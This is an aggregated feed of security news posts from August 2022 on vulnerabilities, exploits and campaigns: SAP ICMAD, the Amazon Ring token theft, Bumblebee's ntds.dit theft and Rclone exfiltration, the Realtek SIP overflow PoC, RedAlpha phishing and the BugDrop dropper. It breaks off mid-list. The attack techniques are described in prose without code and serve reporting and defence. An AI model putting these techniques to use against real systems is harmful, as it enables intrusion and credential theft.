[*] [-] [-] [x] [A+] [a-]  
[l] at 8/19/22 9:44am
US CISA added a critical SAP flaw to its Known Exploited Vulnerabilities Catalog after its details were disclosed at the Black Hat and Def Con conferences. The US Cybersecurity and Infrastructure Security Agency (CISA) added a critical SAP vulnerability, tracked as CVE-2022-22536, to its Known Exploited Vulnerabilities Catalog a few days after researchers shared details about the issue at the Black Hat and Def Con hacker conferences. CVE-2022-22536 is a memory pipes (MPI) desynchronization vulnerability named Internet Communication Manager Advanced Desync (ICMAD). Internet Communication Manager Advanced Desync (ICMAD) is a memory pipes (MPI) desynchronization vulnerability tracked as CVE-2022-22536. The issue was disclosed in February 2022, an unauthenticated remote attacker could exploit this issue by sending a simple HTTP request to a vulnerable instance and take over it. The flaw received a CVSSv3 score of 10.0. The US agency warned that this issue could expose organizations to a broad range of attacks, including data theft, financial fraud risks, disruptions of mission-critical business processes, ransomware attacks, and a halt of all operations. “On February 8, 2022, SAP released security updates to address vulnerabilities affecting multiple products, including critical vulnerabilities affecting SAP applications using SAP Internet Communication Manager (ICM). SAP applications help organizations manage critical business processes—such as enterprise resource planning, product lifecycle management, customer relationship management, and supply chain management.” reads the advisory published by CISA. In February, security researchers from Onapsis, in coordination with SAP, published a Threat Report that provides technical details about three critical vulnerabilities (CVE-2022-22536, CVE-2022-22532 and CVE-2022-22533) that affected Internet Communication Manager (ICM), which is a core component of SAP business applications. “The ICMAD vulnerabilities are particularly critical because the issues exist by default in the SAP Internet Communication Manager (ICM). The ICM is one of the most important components of an SAP NetWeaver application server: It is present in most SAP products and is a critical part of the overall SAP technology stack, connecting SAP applications with the Internet.” reads the Threat Report. “Malicious actors can easily leverage the most critical vulnerability (CVSSv3 10.0) in unprotected systems; the exploit is simple, requires no previous authentication, no preconditions are necessary, and the payload can be sent through HTTP(S), the most widely used network service to access SAP applications.” Onapsis also released an open-source tool, named “onapsis icmad scanner“ to scan systems for ICMAD vulnerabilities. According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog. Experts recommend also private organizations review the Catalog and address the vulnerabilities in their infrastructure. Last week, Onapsis researcher Martin Doyhenard shared details of the issue at the Black Hat conference (on August 10) and at the Def Con conference (on August 13). The expert presented how to exploit inter-process communication in SAP’s HTTP server. This paper will demonstrate how to leverage two memory corruption vulnerabilities found in SAPs proprietary HTTP Server, using high level protocol exploitation techniques. reads the research paper published by Onapsis. Both, CVE-2022-22536 and CVE-2022-22532, were remotely exploitable and could be used by unauthenticated attackers to completely compromise any SAP installation on the planet. By escalating an error in the HTTP request handling process, it was possible to Desynchronize ICM data buffers and hijack every user’s account with advanced HTTP Smuggling CISA orders federal agencies to fix both issues by September 8, 2022. Follow me on Twitter: @securityaffairs and Facebook try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} Pierluigi Paganini (SecurityAffairs – hacking, SAP) The post CISA added SAP flaw to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.

[Category: Breaking News, Hacking, Security, CISA, CVE-2022-22536, hacking news, information security news, IT Information Security, Known Exploited Vulnerabilities Catalog, Pierluigi Paganini, SAP, Security Affairs, Security News]

[*] [-] [-] [x] [A+] [a-]  
[l] at 8/19/22 5:56am
Amazon addressed a high-severity flaw in its Ring app for Android that could have exposed sensitive information and camera recordings. In May, Amazon fixed a high-severity vulnerability in its Ring app for Android that could have allowed a malicious app installed on a users device to access sensitive information and camera recordings. The Ring app allows users to monitor video feeds from multiple devices, including security cameras, video doorbells, and alarm systems. The Android application has been downloaded over 10 million times. Researchers from security firm Checkmarx discovered a vulnerability in the com.ringapp/com.ring.nh.deeplink.DeepLinkActivity activity, which was implicitly exported in the Android Manifest and, for this reason, it was accessible to other applications on the same device. These other applications could be malicious applications that users could be convinced to install. reads the post published by the researchers. This activity would accept, load, and execute web content from any server, as long as the Intents destination URI contained the string “/better-neighborhoods/”. The experts also identified a Reflected Cross-Site Scripting (XSS) issue in cyberchef.schlarpc.people.a2z.com, which can be chained with the previous one to install a malicious application on the device. An attacker can use a rogue app to obtain the users Authorization Token, then can use it to extract the session cookie by sending this information to the endpoint ring[.]com/mobile/authorize along with the devices hardware ID. This payload redirects the WebView to the malicious web page, which can access the __NATIVE__BRIDGE__.getToken() JavaScript Interface that grants access to an Authorization Token, which can then be exfiltrated to an attacker-controlled server. continues the post. This token is a Java Web Token (JWT), which is insufficient to authorize calls to Ring’s multiple APIs. Authorization is enforced using an rs_session cookie. However, this cookie can be obtained by calling the https://ring.com/mobile/authorize endpoint with both a valid Authorization Token plus the corresponding device’s Hardware ID. Once obtained the cookie, the attacker can access to the victims account and personal data associated with the account (i.e. full name, email address, phone number, and geolocation information). Below is a video PoC published by the experts and the timeline for this issue: 1-May-2022     Full findings reported to the Amazon Vulnerability Research Program1-May-2022     Amazon confirmed receiving the report27-May-2022   Amazon released a fix to customers in version .51 (3.51.0 Android , 5.51.0 iOS). “We issued a fix for supported Android customers on May 27, 2022, soon after the researchers submission was processed. Based on our review, no customer information was exposed. This issue would be extremely difficult for anyone to exploit, because it requires an unlikely and complex set of circumstances to execute.” Amazon told to the experts. Follow me on Twitter: @securityaffairs and Facebook try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} Pierluigi Paganini (SecurityAffairs – hacking, Amazon Ring) The post A flaw in Amazon Ring could expose users camera recordings appeared first on Security Affairs.

[Category: Breaking News, Hacking, Internet of Things, Security, Amazon Ring, hacking news, information security news, IT Information Security, Pierluigi Paganini, Security Affairs, Security News]

[*] [-] [-] [x] [A+] [a-]  
[l] at 8/19/22 3:04am
Cisco addressed a high-severity escalation of privilege vulnerability (CVE-2022-20871) in AsyncOS for Cisco Secure Web Appliance. Cisco Secure Web Appliance (formerly Secure Web Appliance (WSA)) offers protection from malware and web-based attacks and provides application visibility and control. Cisco has addressed a high-severity escalation of privilege vulnerability, tracked as CVE-2022-20871, that resides in the web management interface of AsyncOS for Cisco Secure Web Appliance. An authenticated, remote attacker can exploit this issue to perform a command injection and elevate privileges to root. A vulnerability in the web management interface of Cisco AsyncOS for Cisco Secure Web Appliance, formerly Cisco Web Security Appliance (WSA), could allow an authenticated, remote attacker to perform a command injection and elevate privileges to root. reads the advisory published by the IT giant. This vulnerability is due to insufficient validation of user-supplied input for the web interface. An attacker could exploit this vulnerability by authenticating to the system and sending a crafted HTTP packet to the affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system and elevate privileges to root. To successfully exploit this vulnerability, an attacker would need at least read-only credentials. The root cause of the flaw is that user-supplied input to the web interface is not sufficiently validated. An attacker can trigger the flaw by authenticating to the system and sending a crafted HTTP packet to the vulnerable device. The vendor pointed out that to successfully exploit this vulnerability, an attacker would need at least read-only credentials. The company recommends customers to upgrade to an appropriate fixed software release as indicated in the following table. Cisco AsyncOS for Secure Web Appliance ReleaseFirst Fixed ReleaseEarlier than 12.5Not vulnerable12.5Release no. TBD (Sep 2022)14.0Release no. TBD (Aug 2022)14.514.5.0-537 At this time, there are no workarounds to address this issue, the good news is that Cisco is not aware of attacks exploiting this vulnerability in the wild. Follow me on Twitter: @securityaffairs and Facebook try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} Pierluigi Paganini (SecurityAffairs – hacking, Cisco) The post Cisco fixes High-Severity bug in Secure Web Appliance appeared first on Security Affairs.

[Category: Breaking News, Security, CISCO, Hacking, hacking news, IT Information Security, Pierluigi Paganini, Secure Web Appliance, Security Affairs, Security News]

[*] [-] [-] [x] [A+] [a-]  
[l] at 8/19/22 2:33am
Threat actors are using the Bumblebee loader to compromise Active Directory services as part of post-exploitation activities. The Cybereason Global Security Operations Center (GSOC) Team analyzed a cyberattack that involved the Bumblebee Loader and detailed how the attackers were able to compromise the entire network. Most Bumblebee infections started by users executing LNK files which use a system binary to load the malware. The malware is distributed through phishing messages using a malicious attachment or a link to the malicious archive containing Bumblebee. After initial execution, Bumblebee was used to perform post-exploitation activities, including privilege escalation, reconnaissance, and credential theft.  Threat actors conduct intensive reconnaissance activities and redirect the output of executed commands to files for exfiltration. Bumblebee has been active since March 2022 when it was spotted by Googles Threat Analysis Group (TAG), experts noticed that cybercriminal groups that were previously using the BazaLoader and IcedID as part of their malware campaigns switched to the Bumblebee loader. Cybereason GSOC has observed threat actors transitioning from BazarLoader, Trickbot, and IcedID to Bumblebee, which seems to be in active development and generally the loader of choice for many threat actors. reads the analysis published by Cybereason. Bumblebee operators use the Cobalt Strike framework throughout the attack. The threat actors use the obtained credentials to access Active Directory and make a copy of ntds.dit containing data for the entire Active Directory. Lastly, a domain administrator account is used to move laterally, create local user accounts, and exfiltrate data using Rclone software. In the attack analyzed by Cybereason, threat actors used stolen credentials of a highly privileged user to gain access to the Active Directory and compromise the target network. Bumblebee accesses the remote Active Directory machines using Windows Management Instrumentation command-line utility (WMIC) and creates a shadow copy using vssadmin command. In addition, the attacker steals the ntds.dit file from the domain controller. The ntds.dit file is a database that stores Active Directory data, including information about user objects, groups and group membership. The file also stores the password hashes for all users in the domain. continues the analysis. The experts noticed that the time it took between initial access and Active Directory compromise was less than two days. GSOC experts warn that attacks involving Bumblebee must be treated as critical. The attack chain they analyzed allows threat actors to deliver their ransomware in the compromised networks.  Follow me on Twitter: @securityaffairs and Facebook try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} Pierluigi Paganini (SecurityAffairs – hacking, malware) The post Bumblebee attacks, from initial access to the compromise of Active Directory Services appeared first on Security Affairs.

[Category: Breaking News, Malware, Security, bumblebee, Cybercrime, Hacking, hacking news, information security news, IT Information Security, loader, malware, Pierluigi Paganini, Security Affairs, Security News]

[*] [-] [-] [x] [A+] [a-]  
[l] at 8/19/22 1:05am
Estonia announced to have blocked a wave of cyber attacks conducted by Russian hackers against local institutions. Undersecretary for Digital Transformation Luukas Ilves announced that Estonia was hit by the most extensive wave of DDoS attacks it has faced since 2007. The DDoS attacks targeted both public institutions and the private sector. The Pro-Russia hacker group Killnet claimed responsibility for the attacks. Ilves confirmed that Estonian cyber units were able to block the attacks. E-Estonia services were not disrupted. e-Estonia refers to a movement by the government of Estonia to facilitate citizen interactions with the state through the use of electronic solutions. E-services created under this initiative include i-Voting, e-Tax Board, e-Business, e-Banking, e-Ticket, e-School, University via internet, the E-Governance Academy, as well as the release of several mobile applications. Yesterday, Estonia was subject to the most extensive cyber attacks it has faced since 2007. Attempted DDoS attacks targeted both public institutions and the private sector. (1/4) @e_estonia— Luukas Ilves (@luukasilves) August 18, 2022 Kudos to the teams working to keep the lights on @e_estonia, notably @e_riik, @zone_ee, RMIT and all the partners supporting them. (3/4)— Luukas Ilves (@luukasilves) August 18, 2022 The head of Estonias computer emergency response team, Tonu Tammer, told AFP the attacks hit the websites of local authorities, including the police and the government. The attackers also hit a logistics firm. The Killnet group declared to have hit Estonia as a retaliation for the Baltic states removal of a Soviet-era World War II memorial this week. The Baltic state had decided to take down the Soviet T-34 tank from a pedestal in Narva a border city with a large Russian-speaking minority and transfer it to the Estonian War Museum. reèprted the AFP agency. The government had accused Russia of using such monuments to stir up tensions. The Killnet group has been active since March, it launched DDoS attacks against governments that expressed support to Ukraine, including Italy, Romania, Moldova, the Czech Republic, Lithuania, Norway, and Latvia. Follow me on Twitter: @securityaffairs and Facebook try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} Pierluigi Paganini (SecurityAffairs – hacking, Estonia) The post Estonia blocked cyberattacks claimed by Pro-Russia Killnet group appeared first on Security Affairs.

[Category: Breaking News, Cyber warfare, Hacking, Estonia, hacking news, information security news, IT Information Security, KillNet, Pierluigi Paganini, Russia, Security Affairs, Security News]

[*] [-] [-] [x] [A+] [a-]  
[l] at 8/18/22 4:37pm
Apple released Safari 15.6.1 for macOS Big Sur and Catalina to address a zero-day vulnerability actively exploited in the wild. Safari 15.6.1 for macOS Big Sur and Catalina addressed an actively exploited zero-day vulnerability tracked as CVE-2022-32893. The flaw is an out-of-bounds write issue in WebKit and the IT giant fixed it with improved bounds checking. The exploitation of this vulnerability may lead to arbitrary code execution. According to the advisory, threat actors could exploit the flaw by tricking victims into visiting a maliciously crafted web content. Apple confirmed that this issue may have been actively exploited by threat actors in the wild, but it did not provide details about the attacks. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. reads the advisory. The vulnerability was reported by an anonymous researcher. Yesterday, Apple also addressed the same issue for macOS Monterey and iPhone/iPads. The vulnerability has been fixed with the release iOS 15.6.1, iPadOS 15.6.1, and macOS Monterey 12.5.1. The iOS and iPadOS updates are available for iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation). Apple has addressed other six zero-day vulnerabilities since January, below is the list of fixed issues: January 2022: CVE-2022-22587 and CVE-2022-22594.February 2022: CVE-2022-22620.March 2022: CVE-2022-22674 and CVE-2022-22675.May 2022: CVE-2022-22675 Follow me on Twitter: @securityaffairs and Facebook try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} Pierluigi Paganini (SecurityAffairs – hacking, Safari) The post Safari 15.6.1 addresses a zero-day flaw actively exploited in the wild appeared first on Security Affairs.

[Category: Breaking News, Hacking, Security, Apple, hacking news, information security news, IT Information Security, Safari, Security News]

[*] [-] [-] [x] [A+] [a-]  
[l] at 8/18/22 11:57am
Google announced to have blocked the largest ever HTTPs DDoS attack, which reached 46 million requests per second (RPS). Google announced to have blocked the largest ever HTTPs DDoS attack that hit one of its Cloud Armor customers. The IT giant revealed that the attack reached 46 million requests per second (RPS). The attack took place on June 1st, at 09:45, it started with more than 10,000 requests per second (rps) and targeted a customer’s HTTP/S Load Balancer. Eight minutes later, the attack grew to 100,000 requests per second, and two minutes later reached 46 million RPS. The DDoS attack lasted 69 minutes. The company pointed out that the volume of requests per second is at least 76% more than the previous record, which was blocked by Cloudflare in June and that reached 26 million RPS. This is the largest Layer 7 DDoS reported to date—at least 76% larger than the previously reported record. To give a sense of the scale of the attack, that is like receiving all the daily requests to Wikipedia (one of the top 10 trafficked websites in the world) in just 10 seconds. reported Google. The experts reported that the attack originated from 5,256 source IPs from 132 countries, the top 4 countries contributed approximately 31% of the total attack traffic. Approximately 22% (1,169) of the source IPs corresponded to Tor exit nodes, but experts pointed out that the request volume coming from those nodes represented just 3% of the attack traffic. While we believe Tor participation in the attack was incidental due to the nature of the vulnerable services, even at 3% of the peak (greater than 1.3 million rps) our analysis shows that Tor exit-nodes can send a significant amount of unwelcome traffic to web applications and services. continues the report. The geographic distribution and types of unsecured services that were involved in the attack suggest it was launched by a Mēris botnet.    The attack was stopped at the edge of Google’s network, with the malicious requests blocked upstream from the customer’s application. Before the attack started, the customer had already configured Adaptive Protection in their relevant Cloud Armor security policy to learn and establish a baseline model of the normal traffic patterns for their service.  concludes the experts. As a result, Adaptive Protection was able to detect the DDoS attack early in its life cycle, analyze its incoming traffic, and generate an alert with a recommended protective rule–all before the attack ramped up. The customer acted on the alert by deploying the recommended rule leveraging Cloud Armor’s recently launched rate limiting capability to throttle the attack traffic. Another Cloudflare customer was hit with DDoS reaching 26 million RPS. Follow me on Twitter: @securityaffairs and Facebook try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} Pierluigi Paganini (SecurityAffairs – hacking, HTTPs DDoS) The post Google blocked the largest Layer 7 DDoS reported to date appeared first on Security Affairs.

[Category: Breaking News, Hacking, Security, hacking news, information security news, IT Information Security, Pierluigi Paganini, Security Affairs, Security News]

[*] [+] [-] [x] [A+] [a-]  
[l] at 8/18/22 9:24am
A new version of the BlackByte ransomware appeared in the threat landscape, version 2.0 uses extortion techniques similar to LockBit ones. BlackByte ransomware Version 2.0 appeared in the threat landscape after a short break, the latest version has a new data leak site. It is interesting to note that the group introduced some novelties in the extortion strategy. The gang allows victims to pay $5,000 to postpone the leaking of their data by 24 hours, download the data for $200,000, or destroy all the data by paying a $300,000 ransom. The prices are not fixed and could vary depending on the importance of the victim. Researchers from threat intelligence firm KELA noticed that the new BlackBytes leak site lack of wallet addresses, this means that victims cannot pay the ransom. The BlackByte ransomware operation has been active since September 2021, in October 2021 researchers from Trustwave’s SpiderLabs released a decryptor that can allow victims of early versions of BlackByte ransomware to restore their files for free. In February, the US Federal Bureau of Investigation (FBI) revealed that the BlackByte ransomware gang has breached at least three organizations from US critical infrastructure sectors. In 2021, a flaw in the operation was found that allowed a free BlackByte decryptor to be created. Unfortunately, after the weakness was reported, the threat actors fixed the flaw. Follow me on Twitter: @securityaffairs and Facebook try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} Pierluigi Paganini (SecurityAffairs – hacking, Blackbyte) The post BlackByte ransomware v2 is out with new extortion novelties appeared first on Security Affairs.

[Category: Breaking News, Cyber Crime, Malware, Cybercrime, Hacking, hacking news, information security news, IT Information Security, malware, Pierluigi Paganini, ransomware, Security Affairs, Security News]

[*] [+] [-] [x] [A+] [a-]  
[l] at 8/18/22 2:36am
Apple addressed two zero-day vulnerabilities, exploited by threat actors, affecting iOS, iPadOS, and macOS devices. Apple this week released security updates for iOS, iPadOS, and macOS platforms to address two zero-day vulnerabilities exploited by threat actors. Apple did not share details about these attacks. The two flaws are: CVE-2022-32893  An out-of-bounds issue in WebKit which. An attacker can trigger the flaw by tricking target devices into processing maliciously crafted web content to achieve arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. CVE-2022-32894  An out-of-bounds issue in the OS Kernel that could be exploited by a malicious application to execute arbitrary code with the highest privileges. The vulnerabilities have been fixed with the release iOS 15.6.1, iPadOS 15.6.1, and macOS Monterey 12.5.1. The iOS and iPadOS updates are available for iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation). The IT giant solved both the vulnerabilities with improved bounds checking. Apple has addressed other six zero-day vulnerabilities since January, below is the list of fixed issues: January 2022: CVE-2022-22587 and CVE-2022-22594.February 2022: CVE-2022-22620.March 2022: CVE-2022-22674 and CVE-2022-22675.May 2022: CVE-2022-22675 Follow me on Twitter: @securityaffairs and Facebook try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} Pierluigi Paganini (SecurityAffairs – hacking, Apple) The post Apple fixed two new zero-day flaws exploited by threat actors appeared first on Security Affairs.

[Category: Breaking News, Hacking, Mobile, Security, Apple, hacking news, information security news, Security News, zero-Day]

[*] [+] [-] [x] [A+] [a-]  
[l] at 8/18/22 1:10am
Exploit code for a critical vulnerability affecting networking devices using Realtek RTL819x system on a chip released online. The PoC exploit code for a critical stack-based buffer overflow issue, tracked as CVE-2022-27255 (CVSS 9.8), affecting networking devices using Realtek’s RTL819x system on a chip was released online. The issue resides in the Realtek’s SDK for the open-source eCos operating system, it was discovered by researchers from cybersecurity firm Faraday Security On Realtek eCos SDK-based routers, the ‘SIP ALG’ module is vulnerable to buffer overflow. The root cause of the vulnerability is insufficient validation on the received buffer, and unsafe calls to strcpy. The ‘SIP ALG’ module calls strcpy to copy some contents of SIP packets to a predefined fixed buffer and does not check the length of the copied contents. reads the advisory published by Realtek, which published the issue in March 2022. A remote attacker can exploit the vulnerability through a WAN interface by crafting arguments in SDP data or the SIP header to make a specific SIP packet, and the successful exploitation would cause a crash or achieve the remote code execution. Millions of devices, including routers and access points, are exposed to hacking. The experts (Octavio Gianatiempo, Octavio Galland, Emilio Couto, Javier Aguinaga) disclosed technical details of the flaw at the DEFCON hacker conference last week. A remote attacker can exploit the flaw to execute arbitrary code without authentication by sending to the vulnerable devices specially crafted SIP packets with malicious SDP data. The issue is very dangerous because the exploitation doesnt require user interaction. The PoC code developed by the experts works against Nexxt Nebula 300 Plus routers. This repository contains the materials for the talk Exploring the hidden attack surface of OEM IoT devices: pwning thousands of routers with a vulnerability in Realtek’s SDK for eCos OS., which was presented at DEFCON30. reads the description provided with the exploit code on GitHub. The repo includes: analysis: Automated firmware analysis to detect the presence of CVE-2022-27255 (Run analyse_firmware.py).exploits_nexxt: PoC and exploit code. The PoC should work on every affected router, however the exploit code is specific for the Nexxt Nebula 300 Plus router.ghidra_scripts: Vulnerable function call searching script and CVE-2022-27255 detection script.DEFCON: Slide deck & poc video. Johannes Ullrich, Dean of Research at SANS shared a Snort rule that can be used to detect PoC exploit attempt. The rule looks for INVITE messages that contain the string m=audio . It triggers if there are more than 128 bytes following the string (128 bytes is the size of the buffer allocated by the Realtek SDK) and if none of those bytes is a carriage return. The rule may even work sufficiently well without the last content match. Let me know if you see any errors or improvements. wrote the expert. Slides for the DEFCON presentation along with exploits, and a detection script for CVE-2022-27255 are available in this GitHub repository. Follow me on Twitter: @securityaffairs and Facebook try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} Pierluigi Paganini (SecurityAffairs – hacking, Realtek) The post PoC exploit code for critical Realtek RCE flaw released online appeared first on Security Affairs.

[Category: Breaking News, Hacking, hacking news, information security news, IT Information Security, POC code, RCE, Realtek, Security Affairs, Security News]

[*] [+] [-] [x] [A+] [a-]  
[l] at 8/17/22 4:58pm
A China-linked APT group named RedAlpha is behind a long-running mass credential theft campaign aimed at organizations worldwide. Recorded Future researchers attributed a long-running mass credential theft campaign to a Chinese nation-state actor tracked RedAlpha. The campaign targeted global humanitarian, think tank, and government organizations. Experts believe RedAlpha is a group of contractors conducting cyber-espionage activity on behalf of China. Recorded Future identified a link between RedAlpha and a Chinese information security company, whose name appears in the registration of multiple RedAlpha domains. The company called “Nanjing Qinglan Information Technology Co., Ltd. is now known as “Jiangsu Cimer Information Security Technology Co. Ltd. In this activity, RedAlpha very likely sought to gain access to email accounts and other online communications of targeted individuals and organizations. reads the report published by Recorded Future. RedAlpha’s humanitarian and human rights-linked targeting and spoofing of organizations such as Amnesty International and FIDH is particularly concerning given the CCP’s reported human rights abuses in relation to Uyghurs, Tibetans, and other ethnic and religious minority groups in China. Since 2019, RedAlpha registering and weaponizing hundreds of domains that were spoofing organizations such as the International Federation for Human Rights (FIDH), Amnesty International, the Mercator Institute for China Studies (MERICS), Radio Free Asia (RFA), the American Institute in Taiwan (AIT), and other global government, think tank, and humanitarian organizations. Experts also noticed that the attackers used domains spoofing major email and storage service providers like Yahoo (135 typosquat domains), Google (91 typosquat domains), and Microsoft (70 typosquat domains). The domains some cases were hosting fake login pages for popular email providers such as Outlook and Zimbra. The attackers sent out phishing messages leading victims to phishing pages posing as legitimate email login portals. Experts believe attackers target individuals affiliated with the above organizations rather than imitating these organizations to target other third parties. The attack vector is phishing emails containing PDF files that embed malicious links that point to the phishing login pages. RedAlpha’s activity has expanded over the past several years to include credential-phishing campaigns spoofing ministries of foreign affairs in multiple countries. continues the report. We observed phishing pages imitating webmail login portals for Taiwan and Portugal’s MOFAs, as well as multiple domains spoofing Brazil and Vietnam’s MOFAs. Based on these findings and wider activity examined, it is very likely that RedAlpha operators are located within the PRC. Chinese intelligence services’ use of private contractors is also an established trend, with groups such as APT3, APT10, RedBravo (APT31), and APT40 all identified as contractors working for China’s Ministry of State Security (MSS) (1,2,3,4). concludes the report. In the case of RedAlpha, the group’s targeting closely aligns with the strategic interests of the Chinese government, such as the observed emphasis on China-focused think tanks, civil society organizations, and Taiwanese government and political entities. Follow me on Twitter: @securityaffairs and Facebook try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} Pierluigi Paganini (SecurityAffairs – hacking, RedAlpha) The post China-linked RedAlpha behind multi-year credential theft campaign appeared first on Security Affairs.

[Category: APT, Breaking News, Hacking, China, credential theft, hacking news, information security news, IT Information Security, Pierluigi Paganini, RedAlpha, Security Affairs, Security News]

[*] [+] [-] [x] [A+] [a-]  
[l] at 8/17/22 11:58am
Researchers have discovered a previously undocumented Android dropper, dubbed BugDrop, thats still under development. Recently, researchers from ThreatFabric discovered a previously undetected Android dropper, dubbed BugDrop, which is under active development and was designed to bypass security features that will be implemented in the next release of the Google OS. The experts noticed something unusual in the latest sample of the malware family Xenomorph, it was an improved version of the threat that included RAT capabilities by using “Runtime modules”. The Runtime modules allow the malware to perform gestures, touches, and other operations. The new version of Xenomorph was dropped by the BugDrop malware which is able to defeat security measures that Google will introduce to prevent malware requesting Accessibility Services privileges from victims. The dropper was developed by a cybercriminal group known as Hadoken Security, which is the same threat actor that is behind Xenomorph and Gymdrop Android malware. The malicious application spotted by the researchers poses as a QR code reader. Upon launching the application it will request the Accessibility Services access to the user to perform gestures and touches on behalf of the victim. Once granted, while showing a loading screen, the dropper initiates a connection with its onion.ws C2, which relies on the TOR protocol, obtaining back its configuration and the URL of the payload to download and install. reads the analysis of the experts. Throughout the course of our investigation, this URL changed from being one of the samples in the open folder, to an external URL again referring to QR code scanners functionalities, which used a endpoint very similar to what was used by Gymdrop samples that we observed in the wild in the last few months. The presence of instructions in the dropper code to send error messages back to the C2 suggests it is still under development. The experts noticed that starting with Android 13, Google is blocking accessibility API access to apps installed from outside of the official app store. However, BugDrop, attempts to bypass this security measure by deploying malicious payloads via a session-based installation process. In this context, it is important to remind the new security features of Android 13, which will be released in fall of 2022. With this new release, Google introduced the “restricted setting” feauture, which blocks sideloaded applications from requesting Accessibility Services privileges, limiting this kind of request to applications installed with a session-based API (which is the method usually used by app stores). states the analysis. With this in mind, it is clear what criminals are trying to achieve. What is likely happening is that actors are using an already built malware, capable of installing new APKs on an infected device, to test a session based installation method, which would then later be incorporated in a more elaborate and refined dropper. Upon completing the development of the new features, BugDrop will give attackers new capabilities to target banking institutions and bypass security solutions currently being adopted by Google. Follow me on Twitter: @securityaffairs and Facebook try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} Pierluigi Paganini (SecurityAffairs – hacking, BugDrop) The post Bugdrop dropper includes features to circumvent Googles security Controls appeared first on Security Affairs.

[Category: Breaking News, Cyber Crime, Malware, Mobile, Android, BugDrop, Cybercrime, Hacking, hacking news, information security news, IT Information Security, malware, Security Affairs, Security News]

[*] [+] [-] [x] [A+] [a-]  
[l] at 8/17/22 11:01am
Google addressed a dozen vulnerabilities in the Chrome browser, including the fifth Chrome zero-day flaw exploited this year. Google this week released security updates to address a dozen vulnerabilities in its Chrome browser for desktops including an actively exploited high-severity zero-day flaw in the wild. The actively exploited flaw, tracked as CVE-2022-2856, is an Insufficient validation of untrusted input in Intents. The flaw was discovered by Ashley Shen and Christian Resell of Google Threat Analysis Group on 19 July 2022. Google is aware that an exploit for CVE-2022-2856 exists in the wild. reads the advisory published by Google. Google did not share technical details about the issue to prevent further exploitation in the wild. The IT giant also fixed a critical issue, tracked as CVE-2022-2852, which is use after free in FedCM. This issue was reported by Google Project Zero researcher Sergei Glazunov on August 2, 2022. Below is the list of the other issues addressed by the company: [$7000][1337538] High CVE-2022-2854: Use after free in SwiftShader. Reported by Cassidy Kim of Amber Security Lab, OPPO Mobile Telecommunications Corp. Ltd. on 2022-06-18[$7000][1345042] High CVE-2022-2855: Use after free in ANGLE. Reported by Cassidy Kim of Amber Security Lab, OPPO Mobile Telecommunications Corp. Ltd. on 2022-07-16[$5000][1338135] High CVE-2022-2857: Use after free in Blink. Reported by Anonymous on 2022-06-21[$5000][1341918] High CVE-2022-2858: Use after free in Sign-In Flow. Reported by raven at KunLun lab on 2022-07-05[$NA][1350097] High CVE-2022-2853: Heap buffer overflow in Downloads. Reported by Sergei Glazunov of Google Project Zero on 2022-08-04[$3000][1338412] Medium CVE-2022-2859: Use after free in Chrome OS Shell. Reported by Nan Wang(@eternalsakura13) and Guang Gong of 360 Alpha Lab on 2022-06-22[$2000][1345193] Medium CVE-2022-2860: Insufficient policy enforcement in Cookies. Reported by Axel Chong on 2022-07-18[$TBD][1346236] Medium CVE-2022-2861: Inappropriate implementation in Extensions API. Reported by Rong Jian of VRI on 2022-07-21 The CVE-2022-2856 is the fifth zero-day vulnerability in Chrome that Google has addressed this year, the other ones are: CVE-2022-2294 